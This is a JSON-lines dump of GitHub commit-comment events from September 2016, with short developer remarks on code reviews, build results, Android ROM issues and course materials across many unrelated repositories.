{"id":"4578075843","type":"CommitCommentEvent","actor":{"login":"DendyTheElephant"},"repo":{"name":"DendyTheElephant/PixPhetamine"},"payload":{"comment":{"id":19064919,"position":4,"line":351,"path":"Pixphetamine/code/src/UCoreEngine.cpp","commit_id":"8072884f3bb111ad97ef57d20f87159976191e17","created_at":"2016-09-17T14:46:45Z","updated_at":"2016-09-17T14:46:45Z","body":"Comme ça y'en aura pour tout le monde ;) (enfin ceux qui ont la STL normale et ceux qui ont MVC)"}},"created_at":"2016-09-17T14:46:45Z"}
{"id":"4578076241","type":"CommitCommentEvent","actor":{"login":"haoj-huang"},"repo":{"name":"haoj-huang/winform-mathapp"},"payload":{"comment":{"id":19064921,"position":5,"line":5,"path":".gitattributes","commit_id":"6f61c03b952af8dea48e08274ba82b1b292d719f","created_at":"2016-09-17T14:47:01Z","updated_at":"2016-09-17T14:47:01Z","body":"first draft"}},"created_at":"2016-09-17T14:47:01Z"}
{"id":"4578077557","type":"CommitCommentEvent","actor":{"login":"DendyTheElephant"},"repo":{"name":"DendyTheElephant/PixPhetamine"},"payload":{"comment":{"id":19064924,"position":5,"line":43,"path":"Pixphetamine/code/hdr/UCoreEngine.h","commit_id":"8072884f3bb111ad97ef57d20f87159976191e17","created_at":"2016-09-17T14:47:54Z","updated_at":"2016-09-17T14:47:54Z","body":"J'ai pas du voir le membre lors de la fusion.... j'imagine que c'est ce que tu avais add aussi?\r\n@Henry38 "}},"created_at":"2016-09-17T14:47:54Z"}
{"id":"4578077659","type":"CommitCommentEvent","actor":{"login":"StevenMLocke"},"repo":{"name":"StevenMLocke/RL"},"payload":{"comment":{"id":19064925,"position":null,"line":null,"path":null,"commit_id":"c7fe85cb1d898b17fcf26ad54a7d677ec40dad7d","created_at":"2016-09-17T14:47:59Z","updated_at":"2016-09-17T14:47:59Z","body":"thank you for contributing\n\nSent from Q's iPhone. \n\n> On Sep 17, 2016, at 4:45 AM, hacan <notifications@github.com> wrote:\n> \n> Hello, I was able to repair the plugin. I will write there may be someone will be useful to it in the future. To work correctly you need to place in the file \n> https://api.twitch.tv/kraken/streams?game=rocket+league&callback=?\" \n> script.js on line with IDs that can register the site on Twitch\n> https://api.twitch.tv/kraken/streams?client_id=youTOKEN&game=rocket+league&callback=?\n> \n> GL HF regards\n> Thx for this plagin man +)\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-17T14:47:59Z"}
{"id":"4578078840","type":"CommitCommentEvent","actor":{"login":"achab"},"repo":{"name":"achab/cross-reco"},"payload":{"comment":{"id":19064928,"position":null,"line":null,"path":null,"commit_id":"efe15355432c9b78c8fabfd7f52d2234a541ae2a","created_at":"2016-09-17T14:48:41Z","updated_at":"2016-09-17T14:48:41Z","body":"Definitely!\r\nI've always dreamed of working on a smart city project and making the world a better place!"}},"created_at":"2016-09-17T14:48:41Z"}
{"id":"4578079324","type":"CommitCommentEvent","actor":{"login":"zackbatist"},"repo":{"name":"zackbatist/DObsiSS"},"payload":{"comment":{"id":19064930,"position":53,"line":53,"path":"datapackage.json","commit_id":"e2da9de518d8aab9ead782fc310c1b8f094de8fd","created_at":"2016-09-17T14:48:59Z","updated_at":"2016-09-17T14:48:59Z","body":"Yep, thanks for catching that."}},"created_at":"2016-09-17T14:48:59Z"}
{"id":"4578080821","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19064934,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T14:49:59Z","updated_at":"2016-09-17T14:49:59Z","body":"**Re: Line break before question**\r\n\r\nThis is a good suggestion - thanks. Will try and keep in mind going forward.\r\n\r\n**Re: Swirl in general**\r\n\r\nT and True: This has been reported as an issue before [here.](https://github.com/swirldev/swirl/issues/268)\r\nWhat are your thoughts on this? Should we encourage/enforce good style and include an explanation in this regard, or rather just accept both as valid answers?\r\n\r\nQuestion ID's: As far as I'm aware swirl questions don't have explicit id's - but you can reference questions by number in certain contexts e.g. demo_lesson(4) will start from the 4th question in the lesson. Am I missing something?\r\n\r\n**Re: Shift attention to created output**\r\n\r\nI do agree with you here. Will include a message near the start to encourage closing or reducing the size of the editor window when it is not needed (since some later swirl lessons may require editing of scripts etc). And I like your suggestion of explicitly referring to the output before moving on to the next question. I was trying not to draw things out too much - but I agree that it's good to consolidate learning in this way. Over and above that, will also be a good idea to try and design questions in such a way that the amount of output is limited to a few lines where possible (i.e. without compromising the quality of questions)."}},"created_at":"2016-09-17T14:49:59Z"}
{"id":"4578082765","type":"CommitCommentEvent","actor":{"login":"yashade2001"},"repo":{"name":"nougat-hammerhead/device_lge_hammerhead"},"payload":{"comment":{"id":19064938,"position":null,"line":null,"path":null,"commit_id":"9d31003573c33ab9a407cca3aed6fcb43f7640a0","created_at":"2016-09-17T14:51:15Z","updated_at":"2016-09-17T14:51:15Z","body":"self-note: revert this"}},"created_at":"2016-09-17T14:51:15Z"}
{"id":"4578088962","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19064951,"position":null,"line":null,"path":null,"commit_id":"56ac2f7ea95461d58ec6507a86ef9db465dea968","created_at":"2016-09-17T14:55:31Z","updated_at":"2016-09-17T14:55:31Z","body":"TeamCity Todo :: Build [Build 114](http://109.103.226.38:8512/viewLog.html?buildId=38509&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-17T14:55:31Z"}
{"id":"4578088972","type":"CommitCommentEvent","actor":{"login":"Kittnz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19064950,"position":null,"line":null,"path":null,"commit_id":"07d3b8609c9fde2ae968d94fb7b4d79a4f38a708","created_at":"2016-09-17T14:55:31Z","updated_at":"2016-09-17T14:55:31Z","body":"Closes #17962"}},"created_at":"2016-09-17T14:55:31Z"}
{"id":"4578089730","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19064953,"position":null,"line":null,"path":null,"commit_id":"56ac2f7ea95461d58ec6507a86ef9db465dea968","created_at":"2016-09-17T14:56:02Z","updated_at":"2016-09-17T14:56:02Z","body":"TeamCity Todo :: Build [Build 114](http://109.103.226.38:8512/viewLog.html?buildId=38509&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Tests passed: 20; exit code 1 Build time: 00:00:14"}},"created_at":"2016-09-17T14:56:02Z"}
{"id":"4578089927","type":"CommitCommentEvent","actor":{"login":"amet"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19064955,"position":20,"line":296,"path":"xbmc/pictures/GUIWindowSlideShow.cpp","commit_id":"221871b4ed891facec3cc8d7c7a085b52c64069e","created_at":"2016-09-17T14:56:09Z","updated_at":"2016-09-17T14:56:09Z","body":"https://github.com/MrMC/mrmc-private/commit/157a9d1a4e36483b0edc41f974fc39c09c9b11d3"}},"created_at":"2016-09-17T14:56:09Z"}
{"id":"4578090061","type":"CommitCommentEvent","actor":{"login":"matozoid"},"repo":{"name":"DeepSnowNeeL/javaparser"},"payload":{"comment":{"id":19064956,"position":null,"line":null,"path":null,"commit_id":"f14cde760ab561db2865b7f1ac4af8cf006b722a","created_at":"2016-09-17T14:56:13Z","updated_at":"2016-09-17T14:56:13Z","body":"Good stuff!"}},"created_at":"2016-09-17T14:56:13Z"}
{"id":"4578091613","type":"CommitCommentEvent","actor":{"login":"utopszkij"},"repo":{"name":"edemo/Joomla_oauth_plugin"},"payload":{"comment":{"id":19064959,"position":11,"line":9,"path":"adalogin/index.php","commit_id":"dc449fcee2326f581fddc5b900f4f9185220e113","created_at":"2016-09-17T14:57:12Z","updated_at":"2016-09-17T14:57:12Z","body":"* Verzió: 3.00  2016.09.17.\r\n"}},"created_at":"2016-09-17T14:57:12Z"}
{"id":"4578096721","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19064964,"position":7,"line":7,"path":"Week 2/ahmed/Exercise4.hs","commit_id":"b79c86f490063471045c14bf668da723b038f0e0","created_at":"2016-09-17T15:00:10Z","updated_at":"2016-09-17T15:00:10Z","body":"Interesting approach. I did it the other way around (check the properties in isDerangements, then filter permutations using this property).\r\n\r\nThis has the benefit that you don't need to generate all the derangements of a list to check the validity. :)"}},"created_at":"2016-09-17T15:00:10Z"}
{"id":"4578100298","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/ATutor"},"payload":{"comment":{"id":19064973,"position":1,"line":1,"path":"mods/_standard/calendar/client_secret.json","commit_id":"8c944e0cad14739107859801969779490df4d2c3","created_at":"2016-09-17T15:02:10Z","updated_at":"2016-09-17T15:02:10Z","body":"The client_id, project_id, client_secret, javascript_origins, and redirect_uris values will need to be generated. This will require an admin page, child of System Preferences, where these values can be set/edited, and stored as config variable in the config DB table. Perhaps we could talk about how to best implement this."}},"created_at":"2016-09-17T15:02:10Z"}
{"id":"4578103023","type":"CommitCommentEvent","actor":{"login":"pdhanabal"},"repo":{"name":"pdhanabal/ProgrammingAssignment2"},"payload":{"comment":{"id":19064979,"position":null,"line":null,"path":null,"commit_id":"aa2fb3015c28faff595312992d9d0b54a2085b34","created_at":"2016-09-17T15:03:17Z","updated_at":"2016-09-17T15:03:17Z","body":"For some reason, the below is not saved as part of the program.\r\nSo adding the test results here.\r\n# Sample Test Results\r\n#> x = rbind(c(1, 2), c(2, 1))\r\n#> m<-makeCacheMatrix(x)\r\n#> cacheSolve(m)\r\n#[,1]       [,2]\r\n#[1,] -0.3333333  0.6666667\r\n#[2,]  0.6666667 -0.3333333\r\n#> cacheSolve(m)\r\n#getting cached data\r\n#[,1]       [,2]\r\n#[1,] -0.3333333  0.6666667\r\n#[2,]  0.6666667 -0.3333333"}},"created_at":"2016-09-17T15:03:17Z"}
{"id":"4578107604","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19064986,"position":null,"line":null,"path":null,"commit_id":"912d61be4969e9e640919877a3d20810be2a02cc","created_at":"2016-09-17T15:06:03Z","updated_at":"2016-09-17T15:06:03Z","body":"Fixes #14 "}},"created_at":"2016-09-17T15:06:03Z"}
{"id":"4578108092","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19064987,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:06:23Z","updated_at":"2016-09-17T15:06:23Z","body":"treo o patching system image unconditionnally"}},"created_at":"2016-09-17T15:06:23Z"}
{"id":"4578110310","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19064994,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:07:50Z","updated_at":"2016-09-17T15:07:50Z","body":"What version?\n\n2016-09-17 22:06 GMT+07:00 thanhthuy89 <notifications@github.com>:\n\n> treo o patching system image unconditionnally\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-19064987>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9uJd389lciPDacjE3GQ0QOd-O3xiks5qrAHwgaJpZM4J4Cgx>\n> .\n>\n"}},"created_at":"2016-09-17T15:07:50Z"}
{"id":"4578110556","type":"CommitCommentEvent","actor":{"login":"dchu3"},"repo":{"name":"dchu3/api-robot"},"payload":{"comment":{"id":19064995,"position":null,"line":null,"path":null,"commit_id":"412e72ca5ee6904bce14a4ebe8983e07272edaaa","created_at":"2016-09-17T15:08:01Z","updated_at":"2016-09-17T15:08:01Z","body":"Committed"}},"created_at":"2016-09-17T15:08:01Z"}
{"id":"4578111439","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19064999,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:08:39Z","updated_at":"2016-09-17T15:08:39Z","body":"bothtwrp 3.0.2.0 & twrp 2.8.5.0"}},"created_at":"2016-09-17T15:08:39Z"}
{"id":"4578111481","type":"CommitCommentEvent","actor":{"login":"wmwragg"},"repo":{"name":"matrix-org/matrix-react-sdk"},"payload":{"comment":{"id":19065000,"position":null,"line":null,"path":null,"commit_id":"da85df9d1a9667ba7ba42f94a1728daf9e9e52ea","created_at":"2016-09-17T15:08:40Z","updated_at":"2016-09-17T15:08:40Z","body":"You should probably also trim spaces from the begining and end of the input before checking or adding to the invite list, as neither the mxid or email addresses allow these, and should also help confusing error messages "}},"created_at":"2016-09-17T15:08:40Z"}
{"id":"4578112886","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/linux-pine64"},"payload":{"comment":{"id":19065005,"position":null,"line":null,"path":null,"commit_id":"c2796ce6d05bbb2b5cada76b268948b2b6be55f3","created_at":"2016-09-17T15:09:35Z","updated_at":"2016-09-17T15:09:35Z","body":"cc @mikey0000"}},"created_at":"2016-09-17T15:09:35Z"}
{"id":"4578113557","type":"CommitCommentEvent","actor":{"login":"LaurierMantel"},"repo":{"name":"LaurierMantel/bitnomics"},"payload":{"comment":{"id":19065007,"position":null,"line":null,"path":null,"commit_id":"ee6cb955711e3e3146386ef86e2e481ab0f10de1","created_at":"2016-09-17T15:10:00Z","updated_at":"2016-09-17T15:10:00Z","body":"dope."}},"created_at":"2016-09-17T15:10:00Z"}
{"id":"4578113647","type":"CommitCommentEvent","actor":{"login":"ejfcalanza"},"repo":{"name":"ejfcalanza/hello-world"},"payload":{"comment":{"id":19065008,"position":null,"line":null,"path":null,"commit_id":"4905a062c56a76e595b06a895b93a1789bcfb8c5","created_at":"2016-09-17T15:10:03Z","updated_at":"2016-09-17T15:10:03Z","body":"Okay"}},"created_at":"2016-09-17T15:10:03Z"}
{"id":"4578114069","type":"CommitCommentEvent","actor":{"login":"sinanisler"},"repo":{"name":"hsndmrts/MineWars"},"payload":{"comment":{"id":19065009,"position":null,"line":null,"path":null,"commit_id":"dd89c887bcfda432a33f142d0ad508ee3b64fff5","created_at":"2016-09-17T15:10:18Z","updated_at":"2016-09-17T15:10:18Z","body":"ok :+1: "}},"created_at":"2016-09-17T15:10:18Z"}
{"id":"4578114523","type":"CommitCommentEvent","actor":{"login":"Xiyanrom"},"repo":{"name":"Xiyanrom/android_vendor_sm"},"payload":{"comment":{"id":19065011,"position":null,"line":null,"path":null,"commit_id":"5f55daae12d2ff5b69a36c9bbb3c13b98a813b20","created_at":"2016-09-17T15:10:35Z","updated_at":"2016-09-17T15:10:35Z","body":"修复编译sepolicy错误"}},"created_at":"2016-09-17T15:10:35Z"}
{"id":"4578119496","type":"CommitCommentEvent","actor":{"login":"dchu3"},"repo":{"name":"dchu3/api-robot"},"payload":{"comment":{"id":19065028,"position":null,"line":null,"path":null,"commit_id":"412e72ca5ee6904bce14a4ebe8983e07272edaaa","created_at":"2016-09-17T15:13:50Z","updated_at":"2016-09-17T15:13:50Z","body":"another"}},"created_at":"2016-09-17T15:13:50Z"}
{"id":"4578123172","type":"CommitCommentEvent","actor":{"login":"jpmak"},"repo":{"name":"jpmak/jpmak.github.io"},"payload":{"comment":{"id":19065034,"position":null,"line":null,"path":null,"commit_id":"b4626c53319bd04003d023def05d12cf03d1df49","created_at":"2016-09-17T15:16:24Z","updated_at":"2016-09-17T15:16:24Z","body":"1"}},"created_at":"2016-09-17T15:16:24Z"}
{"id":"4578123226","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19065035,"position":6,"line":28,"path":"Regular_Expressions/Introduction/lesson.yaml","commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T15:16:26Z","updated_at":"2016-09-17T15:16:26Z","body":"Is it then maybe worth mentioning that double quotes are usually preferred for consistency with other languages? This is mentioned in the [R help for Quotes](https://stat.ethz.ch/R-manual/R-devel/library/base/html/Quotes.html) and an explanation is offered [here](http://r.789695.n4.nabble.com/Why-double-quote-is-preferred-td1490495.html). I don't really think it matters too much which one prefers to use (I generally use single quotes in R since it is slightly more efficient from a typing perspective), but am wondering whether maybe it could be a worthwhile point of contention?"}},"created_at":"2016-09-17T15:16:26Z"}
{"id":"4578124798","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19065040,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:17:31Z","updated_at":"2016-09-17T15:17:31Z","body":"Sorry. I mean what CM version?"}},"created_at":"2016-09-17T15:17:31Z"}
{"id":"4578124925","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/ATutor"},"payload":{"comment":{"id":19065041,"position":22,"line":83,"path":"mods/_standard/calendar/includes/classes/googlecalendar.class.php","commit_id":"8c944e0cad14739107859801969779490df4d2c3","created_at":"2016-09-17T15:17:35Z","updated_at":"2016-09-17T15:17:35Z","body":"Above in line 63 the demo site which rund https, always output the protocol as http, and identifies the port as 80, even though they are using https and port 443. Not sure why this might be the case.   "}},"created_at":"2016-09-17T15:17:35Z"}
{"id":"4578127067","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19065044,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:19:01Z","updated_at":"2016-09-17T15:19:01Z","body":"aosp 7.0"}},"created_at":"2016-09-17T15:19:01Z"}
{"id":"4578127923","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19065046,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:19:39Z","updated_at":"2016-09-17T15:19:39Z","body":"Do not try to use it. It is useless."}},"created_at":"2016-09-17T15:19:39Z"}
{"id":"4578128336","type":"CommitCommentEvent","actor":{"login":"nortikin"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19065047,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T15:19:56Z","updated_at":"2016-09-17T15:19:56Z","body":"or include certificate to sverchok?"}},"created_at":"2016-09-17T15:19:56Z"}
{"id":"4578130097","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-softwinner"},"payload":{"comment":{"id":19065050,"position":null,"line":null,"path":null,"commit_id":"2d9e7341a15097493ce3bee7a23f9fbefe805ddb","created_at":"2016-09-17T15:21:06Z","updated_at":"2016-09-17T15:21:06Z","body":"cc @mikey0000\r\n"}},"created_at":"2016-09-17T15:21:06Z"}
{"id":"4578131486","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19065053,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:22:05Z","updated_at":"2016-09-17T15:22:05Z","body":"oh no. i only try.. i don't use it to day"}},"created_at":"2016-09-17T15:22:05Z"}
{"id":"4578133271","type":"CommitCommentEvent","actor":{"login":"absprague"},"repo":{"name":"lollar/21_card_trick"},"payload":{"comment":{"id":19065054,"position":50,"line":50,"path":"Dealer.java","commit_id":"8379ad6db6ba9235c08d49a62041b4434c1eabc7","created_at":"2016-09-17T15:23:17Z","updated_at":"2016-09-17T15:23:17Z","body":"This code is good, but there is a couple of things I need to point out on this method. First, the s on the dealtCards array is missing within the method. Second, the deck should not be passed in, the class diagram shows it should really be an array of cards that lives as part of the class variables. "}},"created_at":"2016-09-17T15:23:17Z"}
{"id":"4578133355","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"jquery/qunit"},"payload":{"comment":{"id":19065056,"position":3,"line":2,"path":"test/stack-errors.js","commit_id":"89731f969e6ab9201149c0a1d23767aec6ca72d9","created_at":"2016-09-17T15:23:20Z","updated_at":"2016-09-17T15:23:20Z","body":"Thanks for the explanation."}},"created_at":"2016-09-17T15:23:20Z"}
{"id":"4578135574","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19065064,"position":24,"line":24,"path":"src/Chat/Client/Actions/EditMessageAction.php","commit_id":"b9eb875e52bb124fa3bc39900ba40704dd4b5a2b","created_at":"2016-09-17T15:24:52Z","updated_at":"2016-09-17T15:24:52Z","body":"I think it's better to just have an array here instead of the object.\r\n\r\n```php\r\n[\r\n    \"status\" => int,\r\n    \"headers\" => array,\r\n    \"body\" => string,\r\n]\r\n```"}},"created_at":"2016-09-17T15:24:52Z"}
{"id":"4578136235","type":"CommitCommentEvent","actor":{"login":"dogbert17"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":19065066,"position":null,"line":null,"path":null,"commit_id":"4cc43eea89915303caa66ff3dffec94bae734393","created_at":"2016-09-17T15:25:16Z","updated_at":"2016-09-17T15:25:16Z","body":"Indeed, we’ll have to use a lower number in order to make that point. I’ll fix it.\n\n \n\n \n\nFrom: fecundf [mailto:notifications@github.com] \nSent: den 17 september 2016 15:49\nTo: perl6/doc\nCc: dogbert17; Author\nSubject: Re: [perl6/doc] An incorrect result was being shown in one of the examples for =~= (4cc43ee)\n\n \n\nWhile this corrects the result, it doesn't illustrate \"this operator is not arithmetically symmetrical (doesn't do ± Δ)\" from the sentence above. I think that was the point of that example.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub <https://github.com/perl6/doc/commit/4cc43eea89915303caa66ff3dffec94bae734393#commitcomment-19064733> , or mute the thread <https://github.com/notifications/unsubscribe-auth/ARklMsyDkOUheZAKR6Cei7RTOBhsw7fiks5qq-_MgaJpZM4J_mlY> .  <https://github.com/notifications/beacon/ARklMpt3reWavUjMcXPLRRonULzGue3_ks5qq-_MgaJpZM4J_mlY.gif> \n\n"}},"created_at":"2016-09-17T15:25:16Z"}
{"id":"4578137411","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19065068,"position":null,"line":null,"path":null,"commit_id":"e85e51d41f0f3be40490b0de9a76f20f3685659c","created_at":"2016-09-17T15:26:01Z","updated_at":"2016-09-17T15:26:01Z","body":"Ooops! Sorry guys!"}},"created_at":"2016-09-17T15:26:01Z"}
{"id":"4578138154","type":"CommitCommentEvent","actor":{"login":"stephens999"},"repo":{"name":"m-murphy/haploid-scat"},"payload":{"comment":{"id":19065071,"position":null,"line":null,"path":null,"commit_id":"683dcceb225b36b827fff8a8bb672086b27c33ad","created_at":"2016-09-17T15:26:30Z","updated_at":"2016-09-17T15:26:30Z","body":"you also need to update the function UpdateLocusMeanProb, which computes\r\nthe likelihood. "}},"created_at":"2016-09-17T15:26:30Z"}
{"id":"4578138668","type":"CommitCommentEvent","actor":{"login":"Matt-Brigida"},"repo":{"name":"mcwreath31/Allegheny-County-Property-Assessment"},"payload":{"comment":{"id":19065072,"position":23,"line":23,"path":"server.R","commit_id":"1c207df98f73e2b79ccf120eb9ee1400222f8e7b","created_at":"2016-09-17T15:26:51Z","updated_at":"2016-09-17T15:26:51Z","body":"Remove mytable3?  Looks like it displays the R iris dataset."}},"created_at":"2016-09-17T15:26:51Z"}
{"id":"4578138805","type":"CommitCommentEvent","actor":{"login":"dijonkitchen"},"repo":{"name":"facebook/react-native-fbsdk"},"payload":{"comment":{"id":19065073,"position":null,"line":null,"path":null,"commit_id":"9c63f00a849de685ccae73f57b79ec12a760d53a","created_at":"2016-09-17T15:26:56Z","updated_at":"2016-09-17T15:26:56Z","body":"Is the old installation method no longer supported? "}},"created_at":"2016-09-17T15:26:56Z"}
{"id":"4578139374","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19065074,"position":31,"line":31,"path":"src/Chat/Client/Actions/Action.php","commit_id":"b9eb875e52bb124fa3bc39900ba40704dd4b5a2b","created_at":"2016-09-17T15:27:18Z","updated_at":"2016-09-17T15:27:18Z","body":"I don't think promisors should be exposed via a public method. How about just making the property protected? You could also make `Action` implement `Promisor` and delegate `succeed` and `fail`."}},"created_at":"2016-09-17T15:27:18Z"}
{"id":"4578140101","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19065077,"position":null,"line":null,"path":null,"commit_id":"664b4bbadf770cc22729868112d79d1c191889d0","created_at":"2016-09-17T15:27:48Z","updated_at":"2016-09-17T15:27:48Z","body":"> attila:~$\r\n\r\n firefox\r\n1474125227465\taddons.xpi\tWARN\tSymbolic link /usr/lib/firefox/browser/extensions/trackerfox@bustany.org points to a path which does not exist\r\n\r\nFeltelepítve a tracker-plugins-firefox csomagot, megszűnik.\r\nA firefoxba viszont ez a szimlink bele van drótozva."}},"created_at":"2016-09-17T15:27:48Z"}
{"id":"4578140186","type":"CommitCommentEvent","actor":{"login":"guts94"},"repo":{"name":"MOVZX/Kenzo"},"payload":{"comment":{"id":19065078,"position":null,"line":null,"path":null,"commit_id":"fbfe5c5159a472f1562ead9ba542066a7d307700","created_at":"2016-09-17T15:27:52Z","updated_at":"2016-09-17T15:27:52Z","body":"Please maintain authorship"}},"created_at":"2016-09-17T15:27:52Z"}
{"id":"4578140922","type":"CommitCommentEvent","actor":{"login":"Yunobububu"},"repo":{"name":"Yunobububu/Algorithms"},"payload":{"comment":{"id":19065079,"position":null,"line":null,"path":null,"commit_id":"ef2b19ff8438e4171cfb03fb64cb773f08bd5258","created_at":"2016-09-17T15:28:19Z","updated_at":"2016-09-17T15:28:19Z","body":"T(n)=Θ(nlgn)"}},"created_at":"2016-09-17T15:28:19Z"}
{"id":"4578142810","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19065082,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T15:29:41Z","updated_at":"2016-09-17T15:29:41Z","body":"Use my twrp2.img.zip above."}},"created_at":"2016-09-17T15:29:41Z"}
{"id":"4578142910","type":"CommitCommentEvent","actor":{"login":"jamesaa123aah"},"repo":{"name":"jamesaa123aah/homework1"},"payload":{"comment":{"id":19065083,"position":1,"line":1,"path":"14301066/源码","commit_id":"63d7813fa7a9ac4afcbff849885d60462e64e937","created_at":"2016-09-17T15:29:46Z","updated_at":"2016-09-17T15:29:46Z","body":"package com.server;\r\n\r\n\r\nimport java.net.InetAddress;\r\nimport java.net.ServerSocket;\r\nimport java.net.Socket;\r\n\r\npublic class Server {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// TODO Auto-generated method stub\r\n\r\n\t\ttry {\r\n\t\t\t\r\n\t\t\tServerSocket serverSocket = new ServerSocket(8888); \r\n\t\t\tSocket socket = null; \r\n\t\t\t\r\n\t\t\tint count = 0; \r\n\t\t\tSystem.out.println(\"***服务器即将启动，等待客户端的链接***\");\r\n\t\t\t\r\n\t\t\t\r\n\t\t\twhile (true) {\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\tsocket=serverSocket.accept();\r\n\t\t\t\t\r\n\t\t\t\tServerThread serverThread = new ServerThread(socket);\r\n\t\t\t\r\n\t\t\t\tserverThread.start();\r\n\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t} catch (Exception e) {\r\n\t\t\t// TODO: handle exception\r\n\t\t\te.printStackTrace();\r\n\t\t\tSystem.out.println(\"111\");\r\n\t\t}\r\n\t}\r\n\r\n}\r\n"}},"created_at":"2016-09-17T15:29:46Z"}
{"id":"4578143031","type":"CommitCommentEvent","actor":{"login":"nortikin"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19065084,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T15:29:49Z","updated_at":"2016-09-17T15:29:49Z","body":"downloaded certificate to folder pushed, need to rewrite code corresponding to this github.crt"}},"created_at":"2016-09-17T15:29:49Z"}
{"id":"4578143996","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19065085,"position":11,"line":13,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-17T15:30:22Z","updated_at":"2016-09-17T15:30:22Z","body":"@tolyo the files in the build folder are not needed.  They are the output of the `base-apps-router` which generates the `config-routes.js` file.  Since the `htmlpages` plugin now strips the front matter, the files output by the `base-apps-router` are not needed as part of the build.  Perhaps the build can be updated to output those files to a temp directory to avoid confusion?"}},"created_at":"2016-09-17T15:30:22Z"}
